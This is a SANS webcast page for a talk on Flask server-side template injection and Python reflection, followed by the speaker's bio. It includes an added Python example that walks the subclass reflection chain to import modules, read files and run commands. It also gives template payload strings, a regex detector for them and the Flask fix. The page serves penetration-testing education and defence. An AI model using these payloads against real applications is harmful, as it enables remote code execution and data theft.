
SEC642: Killing snakes for fun, Flask SSTIs and RCEs in Python

  • Monday, January 13, 2020 at 1:00 PM EST (2020-01-13 18:00:00 UTC)
  • Moses Frost


Overview

Here is a word: reflection. How many times have you read the acronyms SSTI (server-side template injection) or even CSTI (client-side template injection) and wondered what they actually do, how they work, or how to exploit one? How do you take a template injection that at first only reads files or leaks configuration and turn it into a remote code execution exploit? This talk gives a glance at the SEC642 material on server-side template injection in Flask, then takes that one concept a few steps further by introducing Python method reflection (walking from any object through its class hierarchy to the modules loaded in the process) to execute code and even plant backdoors. Join Moses Frost as he discusses this and other topics covered in SEC642: Advanced Web App Penetration Testing, Ethical Hacking, and Exploitation Techniques.
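The reflection chain the overview refers to, as an added worked example (it is not code from the webcast, from SANS or from Flask). It runs without Flask or Jinja2 installed: Jinja2's default, non-sandboxed environment resolves `.attr` and `[item]` on template values with ordinary Python getattr/getitem, so every expression below is what an attacker would place inside `{{ }}` once user input has been concatenated into the template source. It goes one step beyond the usual single payload: instead of the hard-coded `__subclasses__()[N]` index that breaks between Python versions, it scans the subclass list for any class whose module globals expose `__import__`. The gadget class it relies on (`os._wrap_close`, present whenever `os` is loaded), the config contents and the probe strings are assumptions constructed for the demo.

```python
"""Python object reflection: from a Flask/Jinja2 SSTI to file read and RCE.

Added example for this webcast page, not code from the talk, SANS or Flask.
Assumption: at least one Python-defined class whose module globals hold
__builtins__ is reachable from object.__subclasses__(); importing os below
guarantees that (os._wrap_close), exactly as it does in a running Flask app.
"""
import os          # makes the os._wrap_close gadget available in a bare interpreter
import re
import tempfile

# Constructed probe strings of the kind typed into a user-controlled template.
PROBE_MATH = "{{ 7*7 }}"                       # renders as 49 when the engine evaluates input
PROBE_REFLECT = "{{ ''.__class__.__mro__[-1].__subclasses__() }}"


def root_object_class():
    """Step 1: any literal is an object, and the last entry of its MRO is `object`.
    Template form: ''.__class__.__mro__[-1]"""
    return "".__class__.__mro__[-1]


def find_globals_gadgets(needed=("__builtins__",)):
    """Step 2: object.__subclasses__() lists every class loaded in the process.
    Keep those with a Python-level __init__ whose module globals contain every
    name in `needed`. Scanning replaces the `__subclasses__()[N]` index of most
    published payloads, which shifts between Python versions.
    Template form: ...__subclasses__()[N].__init__.__globals__"""
    hits = []
    for cls in root_object_class().__subclasses__():
        try:
            module_globals = getattr(cls.__init__, "__globals__", None)  # C-level __init__ has none
        except Exception:
            continue
        if module_globals is not None and all(name in module_globals for name in needed):
            hits.append(cls)
    return hits


def reflected_import(module_name):
    """Step 3: pull __import__ out of a gadget's __builtins__ and import anything,
    without the word `import` ever appearing in the payload.
    Template form: ...__globals__['__builtins__']['__import__']('os')"""
    for cls in find_globals_gadgets():
        builtins_ns = cls.__init__.__globals__["__builtins__"]
        if not isinstance(builtins_ns, dict):   # classes defined in __main__ carry the module object
            builtins_ns = vars(builtins_ns)
        importer = builtins_ns.get("__import__")
        if importer is not None:
            return importer(module_name)
    raise RuntimeError("no gadget class with module globals found")


def reflect_read_file(path):
    """The file-read stage: open() obtained by reflection, never by name."""
    with reflected_import("builtins").open(path) as fh:
        return fh.read()


def reflect_run(argv):
    """The RCE stage: run a command through a subprocess module obtained by
    reflection. Returns stripped stdout."""
    return reflected_import("subprocess").check_output(list(argv), text=True).strip()


CONSTRUCTED_CONFIG = "SECRET_KEY=constructed-example-value\n"   # constructed stand-in for a leaked config


def demo_file_read():
    """Write the constructed config to a temp file and read it back via reflection."""
    with tempfile.NamedTemporaryFile("w", suffix=".cfg", delete=False) as tmp:
        tmp.write(CONSTRUCTED_CONFIG)
        path = tmp.name
    try:
        return reflect_read_file(path)
    finally:
        os.unlink(path)


# Detection side: what a WAF rule or a request-log review should flag in user-supplied values.
_EXPRESSION = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)
_REFLECTION = re.compile(r"__(class|mro|base|subclasses|globals|builtins|import)__")


def classify_input(value):
    """'clean' for no Jinja2 delimiters, 'probe' for an expression such as {{7*7}},
    'reflection' when the expression also reaches for dunder attributes."""
    if not _EXPRESSION.search(value):
        return "clean"
    return "reflection" if _REFLECTION.search(value) else "probe"


if __name__ == "__main__":
    print(root_object_class(), len(find_globals_gadgets()), "gadget classes")
    print(demo_file_read().strip())
    print(reflect_run(["echo", "reflected command execution"]))
    for probe in ("Alice", PROBE_MATH, PROBE_REFLECT):
        print(f"{probe!r}: {classify_input(probe)}")
```

The Flask-side fix is to keep user data out of the template source altogether: `render_template_string("Hello {{ name }}", name=name)` passes it as a context variable, whereas building the string first (`"Hello " + name`) hands the engine attacker-controlled syntax. `jinja2.sandbox.SandboxedEnvironment` refuses attribute names that start with an underscore, so `__class__` is rejected there, but treat that as defence in depth rather than a reason to concatenate.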

Speaker Bio

Moses Frost

Moses Frost is a 20-year IT veteran who has worked at large healthcare organizations, startups in data and data mining, FinTech, and large technology companies such as Cisco Systems. He has been an incident responder, penetration tester, IT architect, and platform engineer. He has spoken at various conferences during his tenure, including DEF CON and BSides. He is the author of SEC588: Cloud Penetration Testing and SEC642: Advanced Web Application Penetration Testing.
